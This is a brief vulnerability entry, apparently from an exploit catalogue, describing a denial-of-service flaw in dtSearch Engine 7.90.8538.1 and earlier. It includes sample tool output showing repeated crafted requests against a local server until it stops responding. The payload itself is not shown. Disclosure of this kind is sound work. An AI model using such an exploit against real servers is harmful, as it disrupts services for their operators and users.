dtSearch Engine <= v7.90.8538.1 Denial of Service
Description
A stack exhaustion vulnerability in the search function of dtSearch Corp. dtSearch Engine 7.90.8538.1 and prior allows remote attackers to cause a denial of service condition by sending a specially crafted HTTP request.
Example output
[+] Retrieving form from http://localhost/dtSearch.html
[+] Variables:
* Url: "http://localhost/dtSearch/dtisapi6.dll"
* Keyword: "server"
* Index: "*{aa7eb69bcc7362bf3b92a8b29ae568ff} documents"
* OrigSearchForm: "/dtSearch.html"
[+] Sending DoS payload... Succes! Connection reset.
[+] Sending DoS payload... Succes! Connection reset.
[+] Sending DoS payload... Succes! Connection reset.
[+] Sending DoS payload... Succes! Connection reset.
[+] Sending DoS payload... Succes! Connection reset.
[+] Sending DoS payload... Failed. Server down?
